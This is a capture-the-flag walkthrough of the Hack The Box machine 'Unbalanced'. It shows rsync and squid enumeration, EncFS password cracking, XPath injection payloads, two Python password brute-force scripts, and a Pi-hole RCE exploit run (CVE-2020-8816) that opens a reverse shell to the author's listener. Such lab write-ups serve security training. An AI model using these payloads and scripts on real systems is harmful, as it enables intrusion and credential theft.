Hack-The-Box-walkthrough[Unbalanced]

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 01 Aug 2020
IP: 10.10.10.200

User Blood : InfoSecJack 00 days, 01 hours, 49 mins, 26 seconds.
Root Blood : snowscan 00 days, 02 hours, 09 mins, 09 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# nmap -sC -sV -p- 10.10.10.200 -v --min-rate=10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
| 256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_ 256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp open rsync (protocol version 31)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Rsync

1
2
3
4
5
6
7
8
9
10
root@kali:~/hackthebox/machine/unbalanced# nc -vn 10.10.10.200 873
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.200:873.
@RSYNCD: 31.0
@RSYNCD: 31.0
#list
conf_backups EncFS-encrypted configuration backups
@RSYNCD: EXIT
exit
Ncat: Broken pipe.

Downloading the files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
root@kali:~/hackthebox/machine/unbalanced# rsync -av rsync://10.10.10.200/conf_backups files
receiving incremental file list
created directory files
./
,CBjPJW4EGlcqwZW4nmVqBA6
-FjZ6-6,Fa,tMvlDsuVAO7ek
.encfs6.xml
0K72OfkNRRx3-f0Y6eQKwnjn
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-
2VyeljxHWrDX37La6FhUGIJS
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1
3cdBkrRF7R5bYe1ZJ0KYy786
3xB4vSQH-HKVcOMQIs02Qb9,
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,
5FTRnQDoLdRfOEPkrhM2L29P
5IUA28wOw0wwBs8rP5xjkFSs
6R1rXixtFRQ5c9ScY8MBQ1Rg
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1
8CBL-MBKTDMgB6AT2nfWfq-e
8XDA,IOhFFlhh120yl54Q0da
8e6TAzw0xs2LVxgohuXHhWjM
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0
A4qOD1nvqe9JgKnslwk1sUzO
Acv0PEQX8vs-KdK307QNHaiF
B6J5M3OP0X7W25ITnaZX753T
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1
ECXONXBBRwhb5tYOIcjjFZzh
F4F9opY2nhVVnRgiQ,OUs-Y0
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1
FSXWRSwW6vOvJ0ExPK0fXJ6F
IymL3QugM,XxLuKEdwJJOOpi
KPYfvxIoOlrRjTY18zi8Wne-
Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
Kpo3MHQxksW2uYX79XngQu-f
KtFc,DR7HqmGdPOkM2CpLaM9
Mv5TtpmUNnVl-fgqQeYAy8uu
MxgjShAeN6AmkH2tQAsfaj6C
Ni8LDatT134DF6hhQf5ESpo5
Nlne5rpWkOxkPNC15SEeJ8g,
OFG2vAoaW3Tvv1X2J5fy4UV8
OvBqims-kvgGyJJqZ59IbGfy
StlxkG05UY9zWNHBhXxukuP9
TZGfSHeAM42o9TgjGUdOSdrd
VQjGnKU1puKhF6pQG1aah6rc
W5,ILrUB4dBVW-Jby5AUcGsz
Wr0grx0GnkLFl8qT3L0CyTE6
X93-uArUSTL,kiJpOeovWTaP
Ya30M5le2NKbF6rD-qD3M-7t
Yw0UEJYKN,Hjf-QGqo3WObHy
Z8,hYzUjW0GnBk1JP,8ghCsC
ZXUUpn9SCTerl0dinZQYwxrx
ZvkMNEBKPRpOHbGoefPa737T
a4zdmLrBYDC24s9Z59y-Pwa2
c9w3APbCYWfWLsq7NFOdjQpA
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1
dF2GU58wFl3x5R7aDE6QEnDj
dNTEvgsjgG6lKBr8ev8Dw,p7
gK5Z2BBMSh9iFyCFfIthbkQ6
gRhKiGIEm4SvYkTCLlOQPeh-
hqZXaSCJi-Jso02DJlwCtYoz
iaDKfUAHJmdqTDVZsmCIS,Bn
jIY9q65HMBxJqUW48LJIc,Fj
kdJ5whfqyrkk6avAhlX-x0kh
kheep9TIpbbdwNSfmNU1QNk-
l,LY6YoFepcaLg67YoILNGg0
lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
mMGincizgMjpsBjkhWq-Oy0D
oPu0EVyHA6,KmoI1T,LTs83x
pfTT,nZnCUFzyPPOeX9NwQVo
pn6YPUx69xqxRXKqg5B5D2ON
q5RFgoRK2Ttl3U5W8fjtyriX
qeHNkZencKDjkr3R746ZzO5K
sNiR-scp-DZrXHg4coa9KBmZ
sfT89u8dsEY4n99lNsUFOwki
uEtPZwC2tjaQELJmnNRTCLYU
vCsXjR1qQmPO5g3P3kiFyO84
waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5

sent 1,452 bytes received 411,990 bytes 10,466.89 bytes/sec
total size is 405,603 speedup is 0.98

We can see these files are encrypted:

  • EncFS-encrypted

After searching on how to decrypt I found the following post how to decrypt the password:

  • Breaking EncFS given .encfs6.xml

Getting the password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# cd /usr/share/john/
root@kali:/usr/share/john# python encfs2john.py /root/hackthebox/machine/unbalanced/files/ > /root/hackthebox/machine/unbalanced/encfs6.xml.john
root@kali:/usr/share/john# john --wordlist=/usr/share/wordlists/rockyou.txt --progress-every=3 --pot=s3cwalk.pot /root/hackthebox/machine/unbalanced/encfs6.xml.john
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 580280 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 2020-08-20 04:24) 0g/s 61.34p/s 61.34c/s 61.34C/s alyssa..horses
0g 0:00:00:06 0.00% (ETA: 2020-08-20 09:26) 0g/s 61.53p/s 61.53c/s 61.53C/s jeffrey..jerome
0g 0:00:00:09 0.00% (ETA: 2020-08-20 11:45) 0g/s 62.60p/s 62.60c/s 62.60C/s evelyn..flores
bubblegum (/root/hackthebox/machine/unbalanced/files/)
1g 0:00:00:11 DONE (2020-08-17 09:53) 0.08583g/s 63.17p/s 63.17c/s 63.17C/s bambam..raquel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • password is: bubblegum

  • Reading the files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
apt-get install encfs
root@kali:~/hackthebox/machine/unbalanced# encfsctl export files decrypt
EncFS密码:
目录decrypt不存在。
目录"decrypt" 不存在。要创建吗?(y,N) y
root@kali:~/hackthebox/machine/unbalanced# ls
decrypt encfs6.xml.john files
root@kali:~/hackthebox/machine/unbalanced# ls decrypt/
50-localauthority.conf hdparm.conf parser.conf
50-nullbackend.conf host.conf protect-links.conf
51-debian-sudo.conf initramfs.conf reportbug.conf
70debconf input.conf resolv.conf
99-sysctl.conf journald.conf resolved.conf
access.conf kernel-img.conf rsyncd.conf
adduser.conf ldap.conf rsyslog.conf
bluetooth.conf ld.so.conf semanage.conf
ca-certificates.conf libaudit.conf sepermit.conf
com.ubuntu.SoftwareProperties.conf libc.conf sleep.conf
dconf limits.conf squid.conf
debconf.conf listchanges.conf sysctl.conf
debian.conf logind.conf system.conf
deluser.conf logrotate.conf time.conf
dhclient.conf main.conf timesyncd.conf
discover-modprobe.conf mke2fs.conf ucf.conf
dkms.conf modules.conf udev.conf
dns.conf namespace.conf update-initramfs.conf
dnsmasq.conf network.conf user.conf
docker.conf networkd.conf user-dirs.conf
fakeroot-x86_64-linux-gnu.conf nsswitch.conf Vendor.conf
framework.conf org.freedesktop.PackageKit.conf wpa_supplicant.conf
fuse.conf PackageKit.conf x86_64-linux-gnu.conf
gai.conf pam.conf xattr.conf
group.conf pam_env.conf

then we get a lot of config files:

after enum it turns out we need the squid.conf

This is a huge file so use sed to grep only the active lines:

1
2
3
4
5
root@kali:~/hackthebox/machine/unbalanced# sed '/^#/ d' < decrypt/squid.conf > readable.txt
root@kali:~/hackthebox/machine/unbalanced# cat readable.txt
...
a hostname: intranet.unbalanced.htb
a password: Thah$Sh1

got a password from squid and able to see more of the config

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~/hackthebox/machine/unbalanced# squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Mon, 17 Aug 2020 15:07:05 GMT
Content-Type: text/plain;charset=utf-8
Expires: Mon, 17 Aug 2020 15:07:05 GMT
Last-Modified: Mon, 17 Aug 2020 15:07:05 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 9
FQDNcache Entries Cached: 8
FQDNcache Requests: 96
FQDNcache Hits: 0
FQDNcache Negative Hits: 0
FQDNcache Misses: 96
FQDN Cache Contents:

Address Flg TTL Cnt Hostnames
127.0.1.1 H -001 2 unbalanced.htb unbalanced
::1 H -001 3 localhost ip6-localhost ip6-loopback
172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb
127.0.0.1 H -001 1 localhost
172.17.0.1 H -001 1 intranet.unbalanced.htb
ff02::1 H -001 1 ip6-allnodes
ff02::2 H -001 1 ip6-allrouters

Web/proxy

访问

1
http://10.10.10.200:3128/

squid is running on port 3128

now setup the proxy and try to see if we can see the webpage

  • intranet.unbalanced.htb

  • configure foxy proxy:

set the browser to http protocal, ip 10.10.10.200, port 3128

after set up those configures, we can access the following webpage:

1
http://intranet.unbalanced.htb/intranet.php

after some enum we couldn’t find anything interesting but when look back at the squid config we can see something odd

1
2
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb

number one is missing,when we go to

1
http://172.31.179.1

we get the following:

1
Host temporarily taken out of load balancing for security maintenance. 

turns out this one is running, but not in the load balance and as we can see this is for a reason.

1
http://172.31.179.1/intranet.php

get the same page, but the login form here is vulnerable to xpath injection:

payload

1
'or''='

then we got the following things on the page:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
rita
Rita Fubelli
rita@unbalanced.htb
Role: HR Manager

jim
Jim Mickelson
jim@unbalanced.htb
Role: Web Designer

bryan
Bryan Angstrom
bryan@unbalanced.htb
Role: System Administrator

sarah
Sarah Goodman
sarah@unbalanced.htb
Role: Team Leader

with the following injection we are able to bruteforce our password
in the password field:

1
'or substring(Password,1,1)='p' or'

So everyone that has the first letter p in the password will now be displayed on the page:

write a python script to bruteforce the password, the payload must be single character at a time

crack.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests

url = 'http://172.31.179.1/intranet.php'
proxy_url = 'http://10.10.10.200:3128'
w = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:"<>?'
u = ['rita','jim','bryan','sarah']

for user in u:
data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password,0,1)='x"}
request = requests.post(url, data=data, proxies={'http':proxy_url})
b = len(request.text)
cracked_pass = ''
for i in range(1,80):
found = False
for c in w:
data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password," + str(i) + ",1)='" + c + ""}
request = requests.post(url, data=data, proxies={'http':proxy_url})
if len(request.text) != b:
found = True
break
if not found:
break
print('Attempting User {0}'.format(user))
print('[+]Found character: {2}'.format(user, i, c))
cracked_pass += c
print(cracked_pass)

or crack1.py script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests

url = "http://172.31.179.1/intranet.php"
proxy = "http://10.10.10.200:3128"
letters = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%"
users = ['sarah', 'rita', 'jim', 'bryan']

for user in users:
data = {"Username": '', "Password": "' or username= '" + user + "'or substring(Password,1,1)='p' or'"}
request = requests.post(url, data=data, proxies={'http':proxy})
length = len(request.text)
p4ss = ''
for i in range(1,25):
for l in letters:
data = {"Username": '', "Password": "' or username= '" + "{}".format(user) + "'or substring(Password,{},1)='{}' or'".format(str(i),l)}
request1 = requests.post(url, data=data, proxies={'http':proxy})
if "{}@unbalanced.htb".format(user) in request1.text and len(request1.text) != 6756:
print("Got hit for User '{}' - Letter is '{}'".format(user, l))
p4ss += l
print(str(i))
print(str(p4ss))
pass

use burp intruder to bruteforce is also a great idea,

burp setup reference to

  • sevwalk’s unbalanced walkthrough

after run those scripts, we got:

1
2
3
4
rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah'

after tried them all, we got bryan user loged in to ssh

and get the user flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@kali:~# ssh bryan@10.10.10.200
The authenticity of host '10.10.10.200 (10.10.10.200)' can't be established.
ECDSA key fingerprint is SHA256:aiHhPmnhyt434Qvr9CpJRZOmU7m1R1LI29c11na1obY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.200' (ECDSA) to the list of known hosts.
bryan@10.10.10.200's password:
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 17 14:16:06 2020 from 10.10.10.4
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ whoami
bryan
bryan@unbalanced:~$ ls
TODO user.txt
bryan@unbalanced:~$ cat user.txt
51dfe0d5a9a3981ca4fdbfee0619d773

Privilege Escalation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
bryan@unbalanced:~$ cat TODO 
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]

There was a suspicious TODO file in Bryan’s home folder.
What is in progress is vulnerable.
As it is, PiHole might be the hold for privilege escalation.
PiHole server is running in docker and it can be only accessed through the localhost. Let’s find which port it is running.

1
2
3
4
5
6
7
bryan@unbalanced:~$ ss -lnpt | grep 127.0.0.1
LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 128 127.0.0.1:5553 0.0.0.0:*
bryan@unbalanced:~$ curl http://127.0.0.1:5553/
^C
bryan@unbalanced:~$ curl http://127.0.0.1:8080/
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>

seems like I need to find a domain for the PiHole server.
Then ran the linpeas enumeration script on the server.

1
2
3
4
5
6
172.31.179.2 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:02 STALE
172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 STALE
172.31.179.1 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:01 STALE
172.31.179.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:03 STALE
10.10.10.2 dev ens160 lladdr 00:50:56:b9:f9:ab REACHABLE
fe80::250:56ff:feb9:f9ab dev ens160 lladdr 00:50:56:b9:f9:ab router STALE

looks like we found the ip of the pi-hole webpage

1
2
3
4
5
6
bryan@unbalanced:~$ curl 172.31.11.3

<html><head>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<link rel='stylesheet' href='/pihole/blockingpage.css' type='text/css'/>
</head><body id='splashpage'><img src='/admin/img/logo.svg'/><br/>Pi-<b>hole</b>: Your black hole for Internet advertisements<br><a href='/admin'>Did you mean to go to the admin panel?</a></body></html>

turn on the proxy again , see the webpage and are able to login in with the default creds:

login with: admin

1
http://172.31.11.3/admin/

Found the following exploit for pi-hole:

  • Pi-hole 4.4.0 - Remote Code Execution (Authenticated)

Since the exploit is not configured to use a proxy server

we can do two things change the exploit or use ssh tunneling

1
ssh -L 81:172.31.11.3:80 bryan@10.10.10.200

then browser to

1
http://127.0.0.1:81/admin/

use the poc from github

  • CVE-2020-8816

run the script then we got a reverse shell

1
2
3
4
5
6
7
8
root@kali:~/hackthebox/machine/unbalanced# python exp2.py http://127.0.0.1:81 admin 10.10.14.5 3344
Attempting to verify if Pi-hole version is vulnerable
Logging in...
Login succeeded
Grabbing CSRF token
Attempting to read $PATH
Pihole is vulnerable and served's $PATH allows PHP
Sending payload
1
2
3
4
5
6
7
8
9
10
11
root@kali:~# nc -lvp 3344
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3344
Ncat: Listening on 0.0.0.0:3344
Ncat: Connection from 10.10.10.200.
Ncat: Connection from 10.10.10.200:38602.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

Boom! get a shell on the docker

Privilege Escalation–Information Disclosure–Root:

found password in script file

1
bUbBl3gUm$43v3Ry0n3!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ cd /root
$ ls
ph_install.sh
pihole_config.sh
$ cat pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb

then we use the password to get root

wow! easy root!

1
2
3
4
5
6
7
8
9
10
11
12
13
bryan@unbalanced:~$ su root
Password:
root@unbalanced:/home/bryan# cd
root@unbalanced:~# id
uid=0(root) gid=0(root) groups=0(root)
root@unbalanced:~# whoami
root
root@unbalanced:~# ls
root.txt
root@unbalanced:~# cat root
cat: root: No such file or directory
root@unbalanced:~# cat root.txt
9c9972cb01af0521dc17b015c30103c3

Summary of knowledge

  • Rsync download files
  • EncFS password decrypted
  • sed grep the active lines
  • use squidclient to see more information
  • set http-proxy Squid http proxy to access the webpage
  • exploit with xpath injection
  • python script or burp intruder to fuzz xpath payload args
  • Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
  • ssh tunneling port to 127.0.0.1
  • root password disclosure

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…

Welcome to my other publishing channels